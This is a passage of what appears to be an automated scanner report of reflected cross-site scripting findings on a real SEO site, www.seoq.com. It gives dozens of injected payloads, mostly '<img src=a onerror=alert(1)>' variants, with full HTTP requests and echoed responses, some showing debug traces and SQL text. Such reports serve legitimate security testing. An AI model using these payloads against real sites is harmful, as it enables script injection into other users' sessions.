The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d6d2"><img%20src%3da%20onerror%3dalert(1)>cca06ff5eb1 was submitted in the REST URL parameter 5. This input was echoed as 9d6d2"><img src=a onerror=alert(1)>cca06ff5eb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/17989d6d2"><img%20src%3da%20onerror%3dalert(1)>cca06ff5eb1/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:52:07 GMT
Server: Apache
Set-Cookie: CAKEPHP=qoh4qv7s312s05tb7qp9vth8p6; expires=Mon, 09-May-2011 02:52:08 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/17989d6d2"><img src=a onerror=alert(1)>cca06ff5eb1/N" title="SEO Quotient for ">
...[SNIP]...

7.92. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 27c77<img%20src%3da%20onerror%3dalert(1)>e320e195de4 was submitted in the REST URL parameter 6. This input was echoed as 27c77<img src=a onerror=alert(1)>e320e195de4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/1798/N27c77<img%20src%3da%20onerror%3dalert(1)>e320e195de4 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:04 GMT
Server: Apache
Set-Cookie: CAKEPHP=kkbkcldi43kvgr7kjf9rb3d027; expires=Mon, 09-May-2011 02:53:05 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=kkbkcldi43kvgr7kjf9rb3d027; expires=Mon, 09-May-2011 02:53:05 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>e320e195de4" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/1798/N27c77<img src=a onerror=alert(1)>e320e195de4ddd</a>
...[SNIP]...

7.93. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10e4c"><img%20src%3da%20onerror%3dalert(1)>fdf07480bd7 was submitted in the REST URL parameter 6. This input was echoed as 10e4c"><img src=a onerror=alert(1)>fdf07480bd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/1798/N10e4c"><img%20src%3da%20onerror%3dalert(1)>fdf07480bd7 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:52:56 GMT
Server: Apache
Set-Cookie: CAKEPHP=7sjmdmq9ogetig71s5iclg8c02; expires=Mon, 09-May-2011 02:52:57 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=7sjmdmq9ogetig71s5iclg8c02; expires=Mon, 09-May-2011 02:52:57 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/1798/N10e4c"><img src=a onerror=alert(1)>fdf07480bd7" title="SEO Quotient for ">
...[SNIP]...

7.94. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a543b'%3b2545d1f9485 was submitted in the REST URL parameter 6. This input was echoed as a543b';2545d1f9485 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/1798/Na543b'%3b2545d1f9485 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:52:58 GMT
Server: Apache
Set-Cookie: CAKEPHP=mmj8kuukdd1rlb7pp2ne3jf3v3; expires=Mon, 09-May-2011 02:52:58 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/1798/Na543b';2545d1f9485';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.95. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7e3a"><img%20src%3da%20onerror%3dalert(1)>74f4e28a186 was submitted in the REST URL parameter 5. This input was echoed as d7e3a"><img src=a onerror=alert(1)>74f4e28a186 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2270d7e3a"><img%20src%3da%20onerror%3dalert(1)>74f4e28a186/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:54 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/2270d7e3a"><img src=a onerror=alert(1)>74f4e28a186/N" title="SEO Quotient for ">
...[SNIP]...

7.96. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9927b'%3bea8e15f9683 was submitted in the REST URL parameter 5. This input was echoed as 9927b';ea8e15f9683 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/22709927b'%3bea8e15f9683/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:55 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54591


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/22709927b';ea8e15f9683/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.97. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e15d9<img%20src%3da%20onerror%3dalert(1)>1f903fbffe7 was submitted in the REST URL parameter 5. This input was echoed as e15d9<img src=a onerror=alert(1)>1f903fbffe7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2270e15d9<img%20src%3da%20onerror%3dalert(1)>1f903fbffe7/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:00 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55871


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 2270e15d9<img src=a onerror=alert(1)>1f903fbffe7 and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...

7.98. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3caeb<img%20src%3da%20onerror%3dalert(1)>66d932dc0c2 was submitted in the REST URL parameter 6. This input was echoed as 3caeb<img src=a onerror=alert(1)>66d932dc0c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2270/N3caeb<img%20src%3da%20onerror%3dalert(1)>66d932dc0c2 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:25 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:26 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>66d932dc0c2" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/2270/N3caeb<img src=a onerror=alert(1)>66d932dc0c2ddd</a>
...[SNIP]...

7.99. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 884bf"><img%20src%3da%20onerror%3dalert(1)>9c07f8e8c0e was submitted in the REST URL parameter 6. This input was echoed as 884bf"><img src=a onerror=alert(1)>9c07f8e8c0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2270/N884bf"><img%20src%3da%20onerror%3dalert(1)>9c07f8e8c0e HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:20 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:21 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/2270/N884bf"><img src=a onerror=alert(1)>9c07f8e8c0e" title="SEO Quotient for ">
...[SNIP]...

7.100. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65697'%3ba38fc3b641e was submitted in the REST URL parameter 6. This input was echoed as 65697';a38fc3b641e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/2270/N65697'%3ba38fc3b641e HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:21 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/2270/N65697';a38fc3b641e';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.101. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb0a7"><img%20src%3da%20onerror%3dalert(1)>7c5aa4a2ff9 was submitted in the REST URL parameter 5. This input was echoed as fb0a7"><img src=a onerror=alert(1)>7c5aa4a2ff9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2271fb0a7"><img%20src%3da%20onerror%3dalert(1)>7c5aa4a2ff9/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:03 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/2271fb0a7"><img src=a onerror=alert(1)>7c5aa4a2ff9/N" title="SEO Quotient for ">
...[SNIP]...

7.102. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1df87<img%20src%3da%20onerror%3dalert(1)>8d2c0db8f8a was submitted in the REST URL parameter 5. This input was echoed as 1df87<img src=a onerror=alert(1)>8d2c0db8f8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/22711df87<img%20src%3da%20onerror%3dalert(1)>8d2c0db8f8a/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:07 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55865


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 22711df87<img src=a onerror=alert(1)>8d2c0db8f8a and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...

7.103. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7152a'%3b46cb5a92766 was submitted in the REST URL parameter 5. This input was echoed as 7152a';46cb5a92766 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/22717152a'%3b46cb5a92766/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:04 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54591


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/22717152a';46cb5a92766/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.104. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload fa882<img%20src%3da%20onerror%3dalert(1)>364ce087de6 was submitted in the REST URL parameter 6. This input was echoed as fa882<img src=a onerror=alert(1)>364ce087de6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2271/Nfa882<img%20src%3da%20onerror%3dalert(1)>364ce087de6 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:31 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:32 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>364ce087de6" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/2271/Nfa882<img src=a onerror=alert(1)>364ce087de6ddd</a>
...[SNIP]...

7.105. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a07d'%3b128b7d3a24e was submitted in the REST URL parameter 6. This input was echoed as 6a07d';128b7d3a24e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/2271/N6a07d'%3b128b7d3a24e HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:27 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/2271/N6a07d';128b7d3a24e';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.106. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e219d"><img%20src%3da%20onerror%3dalert(1)>386ed1751a4 was submitted in the REST URL parameter 6. This input was echoed as e219d"><img src=a onerror=alert(1)>386ed1751a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

